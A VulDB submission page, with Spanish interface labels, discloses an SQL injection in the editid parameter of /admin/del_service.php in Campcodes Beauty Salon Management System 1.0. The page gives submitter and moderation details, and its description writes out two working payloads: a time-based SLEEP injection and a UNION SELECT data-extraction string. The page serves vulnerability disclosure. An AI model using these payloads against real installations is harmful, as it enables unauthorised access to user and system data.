Enviar #186239: SQL injection vulnerability exists in Beauty Salon Management Systeminformación

TítuloSQL injection vulnerability exists in Beauty Salon Management System
DescripciónSQL injection vulnerability exists in editid parameter of /admin/del_service.php file of Beauty Salon Management System Important user data or system data may be leaked and system security may be compromised The environment is secure and the information can be used by malicious users. Payload: editid=0' AND (SELECT 9143 FROM (SELECT(SLEEP(5)))iPiH) AND 'hUGf'='hUGf or editid=0' UNION ALL SELECT NULL,CONCAT(0x71716b7671,0x6b69496d5779615a41506152786d7045794a4e614c7772664f6948666366576e5a4b43535775446b,0x7176767171),NULL,NULL,NULL-- -
Fuente⚠️ https://github.com/E1CHO/cve_hub/blob/main/Beauty%20Salon%20Management%20System/Beauty%20Salon%20Management%20System%20-%20vuln%2012.pdf
Usuario
 SSL_Seven_Security Lab_WangZhiQiang_XiaoZiLong (UID 38936)
Sumisión2023-07-23 20:21 (hace 3 años)
Moderación2023-07-24 18:48 (22 hours later)
EstadoAceptado
Entrada de VulDB235242 [Campcodes Beauty Salon Management System 1.0 /admin/del_service.php editid inyección SQL]
Puntos20

AnteriorVisión De ConjuntoPróximo

Do you want to use VulDB in your project?

Use the official API to access entries easily!